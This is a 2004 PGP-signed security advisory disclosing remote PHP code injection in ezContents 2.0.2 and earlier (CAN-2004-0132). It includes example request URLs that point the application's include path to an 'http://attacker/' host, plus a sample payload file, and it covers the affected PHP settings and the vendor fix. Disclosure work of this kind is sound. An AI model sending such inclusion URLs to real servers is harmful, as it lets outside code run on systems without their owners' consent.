<<< Date Index >>>     <<< Thread Index >>>

PHP Code Injection Vulnerabilities in ezContents 2.0.2 and prior



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


        PHP Code Injection Vulnerabilities in ezContents 2.0.2 and prior

################################################################################
Summary :

ezContents a free open source content management system has been found to be
vulnerable to Multiple PHP Code Injection vulnerabilities.  They enable a
malicious user to access arbitrary files or execute commands on the server.

################################################################################
Details :

Multiple PHP scripts can be exploited to perform PHP Code Injection.

Vulnerable Systems:
* ezContents 2.0.2 and prior

CVE :
CAN-2004-0132

Release Date :
February 11, 2004

Severity :
HIGH

################################################################################
Examples :

                  -------------------------------------------
                         
http://[target]/[ezContents_directory]/include/db.php?GLOBALS[rootdp]=http://attacker/

Will import the following file into the PHP code.
- --> http://attacker/include/adodb/adodb.inc.php

Attacker just has to create the file adodb.inc.php as :
<? print "<?phpinfo();exit?>"?>

Idem with 

http://[target]/[ezContents_directory]/modules/news/archivednews.php?GLOBALS[language_home]=http://attacker/&GLOBALS[gsLanguage]=ezContents

Will import the following file into the PHP code.
- --> http://attacker/ezContents/lang_admin.php

This vulnerability only applies when running ezContents on PHP version 4.3.0 or
above (prior versions did not support the inclusion of remote files); "URL
fopen wrappers" are enabled (the default); and with 'register_globals' set to
"On".

This vulnerability is present in a decent number of PHP files. The behavior of
version 2.0RC3 and 2.0.1 is approximatively the same. Some of the attack are
not working on the both due to different include() calls. (for example the
second one is not working on 2.0RC3 due to an additional "languages/" at the
beginning of the include call).

################################################################################
Vendor Status :

The information has been provided to ezContents Support Team.
A new release with fixes for these vulnerabilities is already available.
- --> http://www.ezcontents.org/forum/viewtopic.php?t=361

################################################################################
Credit :

Cedric Cochin, Security Engineer, netVigilance, inc.
< cco at netvigilance dot com >

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQFAKWcjA9/8vqmWoYQRAkq6AJ9q00rfnDgZhxM+nc7CwkTserUSPQCglQ14
YpfZJvi3ulhpgu/r9dnEpF0=
=g3Xn
-----END PGP SIGNATURE-----